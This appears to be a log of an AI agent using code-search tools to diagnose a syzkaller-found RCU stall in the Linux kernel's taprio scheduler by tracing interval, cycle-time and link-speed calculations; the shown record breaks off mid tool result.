drivers/net/ethernet/intel/igbvf/defines.h-56-#define HALF_DUPLEX 1
--
drivers/net/ethernet/intel/igc/igc_defines.h-231-
drivers/net/ethernet/intel/igc/igc_defines.h:232:#define SPEED_10 10
drivers/net/ethernet/intel/igc/igc_defines.h:233:#define SPEED_100 100
drivers/net/ethernet/intel/igc/igc_defines.h:234:#define SPEED_1000 1000
drivers/net/ethernet/intel/igc/igc_defines.h-235-#define SPEED_2500 2500
--
include/uapi/linux/ethtool.h=1950=enum ethtool_link_mode_bit_indices {
--
include/uapi/linux/ethtool.h-2176- */
include/uapi/linux/ethtool.h:2177:#define SPEED_10 10
include/uapi/linux/ethtool.h:2178:#define SPEED_100 100
include/uapi/linux/ethtool.h:2179:#define SPEED_1000 1000
include/uapi/linux/ethtool.h-2180-#define SPEED_2500 2500
include/uapi/linux/ethtool.h-2181-#define SPEED_5000 5000
include/uapi/linux/ethtool.h:2182:#define SPEED_10000 10000
include/uapi/linux/ethtool.h-2183-#define SPEED_14000 14000
--
include/uapi/linux/ethtool.h-2188-#define SPEED_56000 56000
include/uapi/linux/ethtool.h:2189:#define SPEED_100000 100000
include/uapi/linux/ethtool.h-2190-#define SPEED_200000 200000
]
|
| 44/2 |
2026/05/24 13:28 |
llm |
expert |
0m
Model:
Tokens:
input: 37502
output: 46
thoughts: 1238
Thoughts: **Debugging a TAPRIO Interval Issue**
Okay, so `SPEED_10` is definitely 10. But hold on, what if the `team` device reports an unusually high speed? Let's double-check the `team_ethtool_get_link_ksettings` function to be sure. It looks like if there are no ports, `speed` ends up being 0. That's right, then it gets set to `SPEED_UNKNOWN`. Then, `taprio_set_picos_per_byte` gets run and, because `speed` is not zero or `SPEED_UNKNOWN`, the `speed` remains `SPEED_10` (10). So, `picos_per_byte` becomes 800000. Then, calculating the duration gives us `60 * 800000 / 1000 = 48000` for the minimum duration.
But wait, why would an interval of 257 pass when the minimum duration is supposed to be 48000? I need to look at `fill_sched_entry` again. Okay, `min_duration` is calculated based on `ETH_ZLEN`. If `q->picos_per_byte` is zero, `min_duration` could indeed be zero. But why would `q->picos_per_byte` be zero? Let me look at `taprio_set_picos_per_byte`. It sets `picos_per_byte` based on the speed. If the speed is very high, `picos_per_byte` could become zero. Ah, but there's a check! It ensures that `picos_per_byte` is at least `TAPRIO_PICOS_PER_BYTE_MIN`, which is 17. Therefore `min_duration` will be at least `60 * 17 / 1000 = 1020 / 1000 = 1`.
So `min_duration` will be at least 1! Oh! If `min_duration` is 1, then the interval 257 is completely valid! But why would it be 1? That only happens if `picos_per_byte` is 17. That in turn, implies the `speed` is very large, e.g. `SPEED_100000` (100,000 Mbps). But I remember the `team` device returns `SPEED_UNKNOWN` if there are no ports!
Now let's see, does the reproducer add any ports to the `team` device? No, the reproducer only creates `team0` and sets taprio on it. Let me look at the reproducer again. It's getting the ifindex of `team0`! But wait... `team0` is created by syzkaller setup code, which isn't in the reproducer itself. However, syzkaller usually creates `team0` and might add ports to it! If syzkaller is adding something to `team0`, what kind of device might it be adding? `dummy` or `veth` would make sense. What is the speed of `veth`? I will need to check this next.
|
| 45/2 |
2026/05/24 13:28 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:drivers/net/veth.c IncludeLines:true Name:veth_get_link_ksettings]
Results: map[SourceCode: 128: static int veth_get_link_ksettings(struct net_device *dev,
129: struct ethtool_link_ksettings *cmd)
130: {
131: cmd->base.speed = SPEED_10000;
132: cmd->base.duplex = DUPLEX_FULL;
133: cmd->base.port = PORT_TP;
134: cmd->base.autoneg = AUTONEG_DISABLE;
135: return 0;
136: }
SourceFile:drivers/net/veth.c]
|
| 46/2 |
2026/05/24 13:28 |
llm |
expert |
0m
Model:
Tokens:
input: 39684
output: 48
thoughts: 457
Thoughts: **Analyzing the Taprio Scheduler's Behavior**
Okay, so I'm looking at this Taprio scheduler code and trying to follow its logic. First, it looks like the `veth` interface has a speed of 10,000 Mbps (`SPEED_10000`). If a `team0` device includes a `veth` port, then the speed is, in fact, 10,000. Now, it calculates `picos_per_byte` as `1000000 * 8 / 10000 = 800`. Then, `length_to_duration` is derived as `60 * 800 / 1000 = 48`. So, if `min_duration` is 48, an `interval = 257` appears valid! That makes sense, I think.
But wait, if the `interval` is set to 257, then `end_time` advances by 257 ns for each entry. The calculations seem straightforward until it addresses `cycle_time`. If `cycle_time` is calculated as `0x4000000 + 0x101 = 67108864 + 257 = 67109121`, this means 67,109,121ns! Now the reproducer is setting two entries: one with an interval of `0x4000000` (67 ms) and the other with an interval of `0x101` (257 ns). So, the effective `cycle_time` is 67 ms. Consequently, `oper->cycle_end_time` advances by 67 ms. That means the high-resolution timer is going to sleep for 67 ms, right?
But why would it stall? The question is, how do these timer intervals interoperate?
I need to go back and check the `advance_sched` function again. Looking at this part:
```c
if (unlikely(!entry || entry->end_time == oper->base_time)) {
next = list_first_entry(&oper->entries, struct sched_entry,
list);
end_time = next->end_time;
goto first_run;
}
```
Wait, it looks like `next->end_time` is pre-calculated during initialization. It's not a live calculation, which is key. Okay, let's now check the function `taprio_calculate_gate_durations`. I need to figure out where and how that timer interval is used.
|
| 47/2 |
2026/05/24 13:28 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:taprio_calculate_gate_durations]
Results: map[SourceCode: 119: static void taprio_calculate_gate_durations(struct taprio_sched *q,
120: struct sched_gate_list *sched)
121: {
122: struct net_device *dev = qdisc_dev(q->root);
123: int num_tc = netdev_get_num_tc(dev);
124: struct sched_entry *entry, *cur;
125: int tc;
126:
127: list_for_each_entry(entry, &sched->entries, list) {
128: u32 gates_still_open = entry->gate_mask;
129:
130: /* For each traffic class, calculate each open gate duration,
131: * starting at this schedule entry and ending at the schedule
132: * entry containing a gate close event for that TC.
133: */
134: cur = entry;
135:
136: do {
137: if (!gates_still_open)
138: break;
139:
140: for (tc = 0; tc < num_tc; tc++) {
141: if (!(gates_still_open & BIT(tc)))
142: continue;
143:
144: if (cur->gate_mask & BIT(tc))
145: entry->gate_duration[tc] += cur->interval;
146: else
147: gates_still_open &= ~BIT(tc);
148: }
149:
150: cur = list_next_entry_circular(cur, &sched->entries, list);
151: } while (cur != entry);
152:
153: /* Keep track of the maximum gate duration for each traffic
154: * class, taking care to not confuse a traffic class which is
155: * temporarily closed with one that is always closed.
156: */
157: for (tc = 0; tc < num_tc; tc++)
158: if (entry->gate_duration[tc] &&
159: sched->max_open_gate_duration[tc] < entry->gate_duration[tc])
160: sched->max_open_gate_duration[tc] = entry->gate_duration[tc];
161: }
162: }
SourceFile:net/sched/sch_taprio.c]
|
| 48/2 |
2026/05/24 13:28 |
llm |
expert |
0m
Model:
Tokens:
input: 41481
output: 46
thoughts: 50
Thoughts: Okay, let me think this through.
**Investigating `entry->end_time` in the `taprio_calculate_gate_durations` function**
Hmm, so I'm digging into this `taprio_calculate_gate_durations` function, and it's suddenly occurred to me that I'm not seeing it explicitly set the `entry->end_time` field. That seems odd, given the function's purpose. I was under the impression it would. Where *is* that value getting populated? I need to trace back and find the source of truth for `entry->end_time`. It’s crucial for the correct operation, so I can’t leave this overlooked. Now, let’s see... the most logical place to look first would be the initialization phase. Okay, I'll go check `setup_first_end_time` and see if that is where the value is assigned.
|
| 49/2 |
2026/05/24 13:28 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:setup_first_end_time]
Results: map[SourceCode:1239: static void setup_first_end_time(struct taprio_sched *q,
1240: struct sched_gate_list *sched, ktime_t base)
1241: {
1242: struct net_device *dev = qdisc_dev(q->root);
1243: int num_tc = netdev_get_num_tc(dev);
1244: struct sched_entry *first;
1245: ktime_t cycle;
1246: int tc;
1247:
1248: first = list_first_entry(&sched->entries,
1249: struct sched_entry, list);
1250:
1251: cycle = sched->cycle_time;
1252:
1253: /* FIXME: find a better place to do this */
1254: sched->cycle_end_time = ktime_add_ns(base, cycle);
1255:
1256: first->end_time = ktime_add_ns(base, first->interval);
1257: taprio_set_budgets(q, sched, first);
1258:
1259: for (tc = 0; tc < num_tc; tc++) {
1260: if (first->gate_duration[tc] == sched->cycle_time)
1261: first->gate_close_time[tc] = KTIME_MAX;
1262: else
1263: first->gate_close_time[tc] = ktime_add_ns(base, first->gate_duration[tc]);
1264: }
1265:
1266: rcu_assign_pointer(q->current_entry, NULL);
1267: }
SourceFile:net/sched/sch_taprio.c]
|
| 50/2 |
2026/05/24 13:28 |
llm |
expert |
0m
Model:
Tokens:
input: 42277
output: 64
thoughts: 456
Thoughts: **Analyzing the Time Calculation in the Taprio Scheduler**
Okay, so I'm tracing through this time calculation logic for the Taprio scheduler, and something feels off. Let's break this down. My initial thought is that `first->end_time` is set to `base + first->interval`. If `base` is in the past, then this means `first->end_time` is also in the past. This is fine, that's expected.
If `first->end_time` is in the past, then on the initial run, `advance_sched` will immediately set `end_time = first->end_time`. This causes the hrtimer to fire immediately. On the second run of `advance_sched`, this is the crucial part:
```
if (should_restart_cycle(oper, entry)) {
...
} else {
next = list_next_entry(entry, list);
}
end_time = ktime_add_ns(entry->end_time, next->interval);
```
So the code calculates `end_time` as `first->end_time + next->interval`. If `base` – which I believe is `sched->base_time` – is far in the past, then `end_time` will become far in the past. This leads to a likely problem, it seems.
Wait a second. The reproducer sets a value at the address `0x2000000007c0` to 0. Okay, I see. My concern is, `TCA_TAPRIO_ATTR_SCHED_BASE_TIME` is not set in the reproducer! That's it!
If `TCA_TAPRIO_ATTR_SCHED_BASE_TIME` isn't set, then `new->base_time` remains as zero, and this default value is zero. Let me confirm this: yes, let's look at `parse_taprio_schedule`:
```
if (tb[TCA_TAPRIO_ATTR_SCHED_BASE_TIME])
new->base_time = nla_get_s64(tb[TCA_TAPRIO_ATTR_SCHED_BASE_TIME]);
```
So if `TCA_TAPRIO_ATTR_SCHED_BASE_TIME` is not set, then `new->base_time` will be zero. This also means that, later on, `setup_first_end_time` is called with a base of 0.
So, I think I've found the issue. The missing `TCA_TAPRIO_ATTR_SCHED_BASE_TIME` coupled with the zero value assignment results in an `end_time` being potentially very far in the past, which then likely triggers an immediate firing or unexpected behavior of the hrtimer. Now, I need to check where `setup_first_end_time` is called from to confirm how this base time flows through.
|
| 51/2 |
2026/05/24 13:28 |
tool |
codesearch-find-references |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeSnippetLines:2 Name:setup_first_end_time SourceTreePrefix:net/sched/sch_taprio.c]
Results: map[References:[map[ReferenceKind:calls ReferencingEntityKind:function ReferencingEntityName:taprio_change SourceFile:net/sched/sch_taprio.c SourceLine:1973 SourceSnippet:1971: call_rcu(&admin->rcu, taprio_free_sched_cb);
1972: } else {
1973: setup_first_end_time(q, new_admin, start);
1974:
1975: /* Protects against advance_sched() */
]] TruncatedOutput:false]
|
| 52/2 |
2026/05/24 13:28 |
llm |
expert |
0m
Model:
Tokens:
input: 43606
output: 43
thoughts: 18
Thoughts: Okay, let's dive into this code.
**Diving into `taprio_change` Around Line 1973**
Right, so I need to understand what's happening around line 1973, specifically within the context of `taprio_change`. My initial thought is to quickly locate that section of the file. I want to see the surrounding code, the context in which `taprio_change` is used and how it operates in its environment. I anticipate seeing method calls, variable assignments, potentially some conditional logic, or maybe even loops. The goal is to immediately grasp the *purpose* of `taprio_change` in this specific area and identify any immediate areas of concern or interest. From there I'll be able to tell what's important.
|
| 53/2 |
2026/05/24 13:28 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:taprio_change]
Results: map[SourceCode:1816: static int taprio_change(struct Qdisc *sch, struct nlattr *opt,
1817: struct netlink_ext_ack *extack)
1818: {
1819: struct qdisc_size_table *stab = rtnl_dereference(sch->stab);
1820: struct nlattr *tb[TCA_TAPRIO_ATTR_MAX + 1] = { };
1821: struct sched_gate_list *oper, *admin, *new_admin;
1822: struct taprio_sched *q = qdisc_priv(sch);
1823: struct net_device *dev = qdisc_dev(sch);
1824: struct tc_mqprio_qopt *mqprio = NULL;
1825: unsigned long flags;
1826: u32 taprio_flags;
1827: ktime_t start;
1828: int i, err;
1829:
1830: err = nla_parse_nested_deprecated(tb, TCA_TAPRIO_ATTR_MAX, opt,
1831: taprio_policy, extack);
1832: if (err < 0)
1833: return err;
1834:
1835: if (tb[TCA_TAPRIO_ATTR_PRIOMAP])
1836: mqprio = nla_data(tb[TCA_TAPRIO_ATTR_PRIOMAP]);
1837:
1838: /* The semantics of the 'flags' argument in relation to 'change()'
1839: * requests, are interpreted following two rules (which are applied in
1840: * this order): (1) an omitted 'flags' argument is interpreted as
1841: * zero; (2) the 'flags' of a "running" taprio instance cannot be
1842: * changed.
1843: */
1844: taprio_flags = nla_get_u32_default(tb[TCA_TAPRIO_ATTR_FLAGS], 0);
1845:
1846: /* txtime-assist and full offload are mutually exclusive */
1847: if ((taprio_flags & TCA_TAPRIO_ATTR_FLAG_TXTIME_ASSIST) &&
1848: (taprio_flags & TCA_TAPRIO_ATTR_FLAG_FULL_OFFLOAD)) {
1849: NL_SET_ERR_MSG_ATTR(extack, tb[TCA_TAPRIO_ATTR_FLAGS],
1850: "TXTIME_ASSIST and FULL_OFFLOAD are mutually exclusive");
1851: return -EINVAL;
1852: }
1853:
1854: if (q->flags != TAPRIO_FLAGS_INVALID && q->flags != taprio_flags) {
1855: NL_SET_ERR_MSG_MOD(extack,
1856: "Changing 'flags' of a running schedule is not supported");
1857: return -EOPNOTSUPP;
1858: }
1859: q->flags = taprio_flags;
1860:
1861: /* Needed for length_to_duration() during netlink attribute parsing */
1862: taprio_set_picos_per_byte(dev, q, extack);
1863:
1864: err = taprio_parse_mqprio_opt(dev, mqprio, extack, q->flags);
1865: if (err < 0)
1866: return err;
1867:
1868: err = taprio_parse_tc_entries(sch, opt, extack);
1869: if (err)
1870: return err;
1871:
1872: new_admin = kzalloc(sizeof(*new_admin), GFP_KERNEL);
1873: if (!new_admin) {
1874: NL_SET_ERR_MSG(extack, "Not enough memory for a new schedule");
1875: return -ENOMEM;
1876: }
1877: INIT_LIST_HEAD(&new_admin->entries);
1878:
1879: oper = rtnl_dereference(q->oper_sched);
1880: admin = rtnl_dereference(q->admin_sched);
1881:
1882: /* no changes - no new mqprio settings */
1883: if (!taprio_mqprio_cmp(dev, mqprio))
1884: mqprio = NULL;
1885:
1886: if (mqprio && (oper || admin)) {
1887: NL_SET_ERR_MSG(extack, "Changing the traffic mapping of a running schedule is not supported");
1888: err = -ENOTSUPP;
1889: goto free_sched;
1890: }
1891:
1892: if (mqprio) {
1893: err = netdev_set_num_tc(dev, mqprio->num_tc);
1894: if (err)
1895: goto free_sched;
1896: for (i = 0; i < mqprio->num_tc; i++) {
1897: netdev_set_tc_queue(dev, i,
1898: mqprio->count[i],
1899: mqprio->offset[i]);
1900: q->cur_txq[i] = mqprio->offset[i];
1901: }
1902:
1903: /* Always use supplied priority mappings */
1904: for (i = 0; i <= TC_BITMASK; i++)
1905: netdev_set_prio_tc_map(dev, i,
1906: mqprio->prio_tc_map[i]);
1907: }
1908:
1909: err = parse_taprio_schedule(q, tb, new_admin, extack);
1910: if (err < 0)
1911: goto free_sched;
1912:
1913: if (new_admin->num_entries == 0) {
1914: NL_SET_ERR_MSG(extack, "There should be at least one entry in the schedule");
1915: err = -EINVAL;
1916: goto free_sched;
1917: }
1918:
1919: err = taprio_parse_clockid(sch, tb, extack);
1920: if (err < 0)
1921: goto free_sched;
1922:
1923: taprio_update_queue_max_sdu(q, new_admin, stab);
1924:
1925: if (FULL_OFFLOAD_IS_ENABLED(q->flags))
1926: err = taprio_enable_offload(dev, q, new_admin, extack);
1927: else
1928: err = taprio_disable_offload(dev, q, extack);
1929: if (err)
1930: goto free_sched;
1931:
1932: /* Protects against enqueue()/dequeue() */
1933: spin_lock_bh(qdisc_lock(sch));
1934:
1935: if (tb[TCA_TAPRIO_ATTR_TXTIME_DELAY]) {
1936: if (!TXTIME_ASSIST_IS_ENABLED(q->flags)) {
1937: NL_SET_ERR_MSG_MOD(extack, "txtime-delay can only be set when txtime-assist mode is enabled");
1938: err = -EINVAL;
1939: goto unlock;
1940: }
1941:
1942: q->txtime_delay = nla_get_u32(tb[TCA_TAPRIO_ATTR_TXTIME_DELAY]);
1943: }
1944:
1945: if (!TXTIME_ASSIST_IS_ENABLED(q->flags) &&
1946: !FULL_OFFLOAD_IS_ENABLED(q->flags) &&
1947: !hrtimer_active(&q->advance_timer)) {
1948: hrtimer_setup(&q->advance_timer, advance_sched, q->clockid, HRTIMER_MODE_ABS);
1949: }
1950:
1951: err = taprio_get_start_time(sch, new_admin, &start);
1952: if (err < 0) {
1953: NL_SET_ERR_MSG(extack, "Internal error: failed get start time");
1954: goto unlock;
1955: }
1956:
1957: setup_txtime(q, new_admin, start);
1958:
1959: if (TXTIME_ASSIST_IS_ENABLED(q->flags)) {
1960: if (!oper) {
1961: rcu_assign_pointer(q->oper_sched, new_admin);
1962: err = 0;
1963: new_admin = NULL;
1964: goto unlock;
1965: }
1966:
1967: /* Not going to race against advance_sched(), but still */
1968: admin = rcu_replace_pointer(q->admin_sched, new_admin,
1969: lockdep_rtnl_is_held());
1970: if (admin)
1971: call_rcu(&admin->rcu, taprio_free_sched_cb);
1972: } else {
1973: setup_first_end_time(q, new_admin, start);
1974:
1975: /* Protects against advance_sched() */
1976: spin_lock_irqsave(&q->current_entry_lock, flags);
1977:
1978: taprio_start_sched(sch, start, new_admin);
1979:
1980: admin = rcu_replace_pointer(q->admin_sched, new_admin,
1981: lockdep_rtnl_is_held());
1982: if (admin)
1983: call_rcu(&admin->rcu, taprio_free_sched_cb);
1984:
1985: spin_unlock_irqrestore(&q->current_entry_lock, flags);
1986:
1987: if (FULL_OFFLOAD_IS_ENABLED(q->flags))
1988: taprio_offload_config_changed(q);
1989: }
1990:
1991: new_admin = NULL;
1992: err = 0;
1993:
1994: if (!stab)
1995: NL_SET_ERR_MSG_MOD(extack,
1996: "Size table not specified, frame length estimations may be inaccurate");
1997:
1998: unlock:
1999: spin_unlock_bh(qdisc_lock(sch));
2000:
2001: free_sched:
2002: if (new_admin)
2003: call_rcu(&new_admin->rcu, taprio_free_sched_cb);
2004:
2005: return err;
2006: }
SourceFile:net/sched/sch_taprio.c]
|
| 54/2 |
2026/05/24 13:28 |
llm |
expert |
0m
Model:
Tokens:
input: 46981
output: 47
thoughts: 16
Thoughts: Okay, here's my attempt at summarizing the thought process, as requested, in the first person and targeted towards an expert:
**Understanding the Starting Point**
Alright, so I'm digging into this scheduling process, and the first thing I need to get a handle on is where the whole thing *begins*. Seems logical, right? I'm getting that crucial starting point, or `start`, from this `taprio_get_start_time` function. Okay, cool, so the initial kickoff time, the absolute beginning of the scheduling horizon, is now known to me. This immediately frames my understanding of what follows, setting a base from which all subsequent calculations or decisions will be made. I'm noting this is fundamental for building up whatever scheduling process is being employed.
|
| 55/2 |
2026/05/24 13:28 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:taprio_get_start_time]
Results: map[SourceCode:1205: static int taprio_get_start_time(struct Qdisc *sch,
1206: struct sched_gate_list *sched,
1207: ktime_t *start)
1208: {
1209: struct taprio_sched *q = qdisc_priv(sch);
1210: ktime_t now, base, cycle;
1211: s64 n;
1212:
1213: base = sched_base_time(sched);
1214: now = taprio_get_time(q);
1215:
1216: if (ktime_after(base, now)) {
1217: *start = base;
1218: return 0;
1219: }
1220:
1221: cycle = sched->cycle_time;
1222:
1223: /* The qdisc is expected to have at least one sched_entry. Moreover,
1224: * any entry must have 'interval' > 0. Thus if the cycle time is zero,
1225: * something went really wrong. In that case, we should warn about this
1226: * inconsistent state and return error.
1227: */
1228: if (WARN_ON(!cycle))
1229: return -EFAULT;
1230:
1231: /* Schedule the start time for the beginning of the next
1232: * cycle.
1233: */
1234: n = div64_s64(ktime_sub_ns(now, base), cycle);
1235: *start = ktime_add_ns(base, (n + 1) * cycle);
1236: return 0;
1237: }
SourceFile:net/sched/sch_taprio.c]
|
| 56/2 |
2026/05/24 13:28 |
llm |
expert |
0m
Model:
Tokens:
input: 47724
output: 45
thoughts: 1842
Thoughts: **Analyzing the Taprio Scheduler's Timing**
Okay, let's break this down step-by-step. It seems we're looking at how the TAPRIO scheduler calculates its timing and why it might be causing a stall.
First, let's clarify some variables. If the `base` time is zero, and `now` is, say, 100 seconds (100,000,000,000 ns), and the `cycle` is 67,109,121 ns. `n = now / cycle`. So `start = (n + 1) * cycle` This means that `start` is a point in the future. The key part is that, `start` is in the future.
When `start` is calculated in the future, then the code calls `setup_first_end_time` which set `first->end_time = start + first->interval`. Then `taprio_start_sched` sets the hrtimer. Since `start` is in the future, it looks like the timer will sleep until `start`. When it wakes up, `advance_sched` will be called.
Looking at the code inside `advance_sched`, if `entry` is NULL (which it initially is), the code goes to `first_run`. In `first_run`, the `end_time = next->end_time`. `next` is the first entry and `next->end_time` is `start + first->interval`, or `start + 67 ms`. That's where it looks like there would be a stall! The hrtimer is set to fire at `start + 67 ms`, and it would sleep for that amount of time.
Now, let's look at the reproducer: `*(uint32_t*)0x2000000008a0 = 0x4000000;`, and `*(uint32_t*)0x2000000008a8 = 0x101;` This corresponds to `interval = 67,108,864` and `interval = 257`. Here, `interval` is truncated.
The question becomes, does it set `TCA_TAPRIO_ATTR_SCHED_CYCLE_TIME` in the reproducer? It doesn't appear so! So, it is calculated from the sum of intervals. This means `cycle_time = 67,109,121`.
Now, if the `cycle_time` is set to 67 ms, the `advance_sched` is expected to increment the `end_time` by 67 ms.
So, in `advance_sched` the `end_time` is being updated:
`end_time = ktime_add_ns(entry->end_time, next->interval);`
`end_time = min(end_time, oper->cycle_end_time);`
`entry->end_time` is the end time of the *current* entry. Initially, it's the end time for the first entry.
So `entry->end_time` is `start + 67 ms`, `next` is the second entry.
`next->interval` is 257 ns.
`end_time` for the second entry is `start + 67 ms + 257 ns`.
`oper->cycle_end_time` is `start + 67 ms`, which is due to `setup_first_end_time`. It is set as `sched->cycle_end_time = ktime_add_ns(base, cycle);`, where `base` is `start` and `cycle` is 67,109,121.
`oper->cycle_end_time` and `entry->end_time` will be:
`oper->cycle_end_time = start + 67109121`, and `entry->end_time = start + 67108864`.
So, `end_time` for the second entry is `start + 67108864 + 257 = start + 67109121`
Which is the same as `oper->cycle_end_time`.
Then the hrtimer is set at `start + 67109121`. This is 257 ns after the first entry.
So, the hrtimer will fire again, and `advance_sched` is called.
`should_restart_cycle
|
| 57/2 |
2026/05/24 13:29 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:should_change_schedules]
Results: map[SourceCode: 883: static bool should_change_schedules(const struct sched_gate_list *admin,
884: const struct sched_gate_list *oper,
885: ktime_t end_time)
886: {
887: ktime_t next_base_time, extension_time;
888:
889: if (!admin)
890: return false;
891:
892: next_base_time = sched_base_time(admin);
893:
894: /* This is the simple case, the end_time would fall after
895: * the next schedule base_time.
896: */
897: if (ktime_compare(next_base_time, end_time) <= 0)
898: return true;
899:
900: /* This is the cycle_time_extension case, if the end_time
901: * plus the amount that can be extended would fall after the
902: * next schedule base_time, we can extend the current schedule
903: * for that amount.
904: */
905: extension_time = ktime_add_ns(end_time, oper->cycle_time_extension);
906:
907: /* FIXME: the IEEE 802.1Q-2018 Specification isn't clear about
908: * how precisely the extension should be made. So after
909: * conformance testing, this logic may change.
910: */
911: if (ktime_compare(next_base_time, extension_time) <= 0)
912: return true;
913:
914: return false;
915: }
SourceFile:net/sched/sch_taprio.c]
|
| 58/2 |
2026/05/24 13:29 |
llm |
expert |
0m
Model:
Tokens:
input: 51164
output: 45
thoughts: 846
Thoughts: **Analyzing the Taprio Scheduler's Schedule Switching Logic**
Okay, let's break this down. It seems the issue revolves around how the Taprio scheduler handles schedule changes and, specifically, how `admin` and `oper` schedules are managed. Initially, `admin` is NULL. `taprio_change` updates it with `new_admin` and then calls `setup_first_end_time` and `taprio_start_sched`. The critical line is `admin = rcu_replace_pointer(q->admin_sched, new_admin, lockdep_rtnl_is_held())`. This replaces the pointer.
Then, there's `advance_sched`, where things get interesting. If `oper` is NULL, `switch_schedules` is called, which sets `q->oper_sched = admin` and `q->admin_sched = NULL`. So, if `admin` was NULL before `advance_sched` and if `oper` is NULL in the first place, then it means that `admin` becomes NULL. If this is the case, `should_change_schedules` will return false.
Now, I'm thinking about edge cases. What if `oper->cycle_time` is zero? `parse_taprio_schedule` sets `cycle_time` to the sum of intervals. Okay, but what if `entry->interval` is 0? The reproducer sets `TCA_TAPRIO_SCHED_ENTRY_INTERVAL` to `0x4000000` and `0x101`. The value 0x4000000 = 67,108,864, so it should fit in a `u32`. This should be fine.
But what if `length_to_duration(q, ETH_ZLEN)` returns zero? We established that the `picos_per_byte` variable is at least 17, so the `min_duration` would be at least 1. But wait, if `min_duration` is zero it will break our expectations. I need to re-examine that function:
```c
static int length_to_duration(struct taprio_sched *q, int len)
{
return div_u64(len * atomic64_read(&q->picos_per_byte), PSEC_PER_NSEC);
}
```
If `len * picos_per_byte` is less than 1000, `div_u64` will return zero. `ETH_ZLEN` is 60, but what happens if `picos_per_byte` is 16? That's the key. `60 * 16 = 960` and `960 / 1000` is 0. So, `min_duration` could be zero! Ah, but `TAPRIO_PICOS_PER_BYTE_MIN` is 17! Thus, `60 * 17 = 1020` and `1020 / 1000 = 1`. So, it looks like `min_duration` is at least 1. Okay, let's verify that `ETH_ZLEN` is indeed 60.
This is critical. If `min_duration` *could* be 0, that breaks assumptions. Let's trace it and see how it fits into the overall scheduling logic and, most importantly, if we can trigger the vulnerability!
|
| 59/2 |
2026/05/24 13:29 |
tool |
codesearch-definition-source |
0m
Error:
Args: map[ContextFile:include/uapi/linux/if_ether.h IncludeLines:true Name:ETH_ZLEN]
Results: map[SourceCode: SourceFile:]
|
| 60/2 |
2026/05/24 13:29 |
llm |
expert |
0m
Model:
Tokens:
input: 52844
output: 20
thoughts: 11
Thoughts: Here's my thought process, summarized as you requested:
**Navigating Network Headers and Frame Lengths**
Okay, so I need to find where the code defines and uses `ETH_ZLEN`. My immediate instinct is to use `grep`. I want to quickly locate all instances of that specific string within the codebase. I need to understand how the zero-length padding in Ethernet frames, specifically as handled by `ETH_ZLEN`, is defined and used. I'm looking for the declaration, its value, and where that constant is referenced within the relevant source files. This will give me a good overview of how the system handles cases where the payload is smaller than the minimum frame size. Understanding this is crucial for debugging potential packet length issues or network performance anomalies. Let's see what `grep` digs up.
|
| 61/2 |
2026/05/24 13:29 |
tool |
grepper |
0m
Args: map[Expression:#define ETH_ZLEN]
Results: map[Output:include/uapi/linux/if_ether.h-34-#define ETH_HLEN 14 /* Total octets in header. */
include/uapi/linux/if_ether.h:35:#define ETH_ZLEN 60 /* Min. octets in frame sans FCS */
include/uapi/linux/if_ether.h-36-#define ETH_DATA_LEN 1500 /* Max. octets in payload */
]
|
| 62/2 |
2026/05/24 13:29 |
llm |
expert |
0m
Model:
Tokens:
input: 53166
output: 45
thoughts: 5071
Thoughts: **Analysis of the TAPRIO Scheduler RCU Stall**
Okay, here's the breakdown. I've been tracing through this TAPRIO scheduler issue, and I think I've got it.
First, `ETH_ZLEN` is indeed 60, confirming an initial `min_duration` calculation, which makes sense, but it led me down a slightly wrong path at first. The critical piece hinges on how the `interval` and `cycle_time` interact, especially within the context of the TAPRIO schedule entries. My initial concern was about endless loops in `advance_sched`, which doesn't happen. It just returns `HRTIMER_RESTART`, but `__hrtimer_run_queues` is the loop I needed to focus on.
The real problem arises when the `end_time` isn't advancing sufficiently compared to the current time (`basenow`). If the schedule entry's `end_time` is repeatedly less than `basenow`, `__hrtimer_run_queues` gets stuck re-running the same timer again and again. My initial thought was that if `interval` was 1 nanosecond with a gap of 1 second, the timer could run 1 billion times! But I realized `advance_sched` returns a `HRTIMER_RESTART`. And `__hrtimer_run_queues` is looping, which caused me to question where the `advance_sched` call was looping.
The reproducer shows `interval` values like `0x4000000` (67 ms) and `0x101` (257 ns). This caused me to examine how these are set in the schedule entry. It turns out that `TCA_TAPRIO_SCHED_ENTRY_INTERVAL` is set twice in the same entry, and `nla_parse_nested_deprecated` keeps the *last* one. Therefore, the interval is actually 257 nanoseconds.
So, here's the key. With only a single entry in the schedule, the `cycle_time` is also set to 257 ns. Consequently, `advance_sched` advances `end_time` by only 257 ns each time it runs. If a gap of 1 second exists, the timer will fire approximately 3.9 million times, potentially leading to an RCU stall.
I started to dig deeper into why the `min_duration` check isn't preventing this. The code calculates `min_duration` based on the link speed. Initially, I calculated a `min_duration` of 48000 for `SPEED_10`, and if `min_duration` is 48000, `interval = 257` should be rejected. This is where I was missing a key factor. I traced through `taprio_set_picos_per_byte` and realized that `speed` is not necessarily fixed at the initial `SPEED_10` value. The function uses `ethtool` to get link settings, and, crucially, if an error happens when calling `ethtool_get_link_ksettings` then the speed defaults to the original `SPEED_10`, but it can be changed.
The reproducer interacts with a `team0` device, which has ports. The speed depends on what speed the devices in the `team0` have. Specifically, if the `team` device's speed comes from an ethtool call, and the speed reported is `10000`, then my `min_duration` calculation is changed. Therefore, `picos_per_byte` is 800 and `min_duration` is `60 * 800 / 1000 = 48`. Now, with `min_duration` being only 48, the reproducer's interval of 257 nanoseconds passes the check! Syzkaller is setting up the environment. So, syzkaller might add devices to the team that have high speeds.
Therefore, the combination of a small `interval` (257 ns) combined with a potentially high `speed` that affects `min_duration`, and no cycle resets, leads to the scheduler repeatedly firing the same timer, eventually leading to the RCU stall when the timer runs 3.8 million times!
|
| 63/2 |
2026/05/24 13:30 |
tool |
codesearch-definition-source |
0m
Args: map[ContextFile:net/sched/sch_taprio.c IncludeLines:true Name:taprio_get_time]
Results: map[SourceCode: 191: static ktime_t taprio_get_time(const struct taprio_sched *q)
192: {
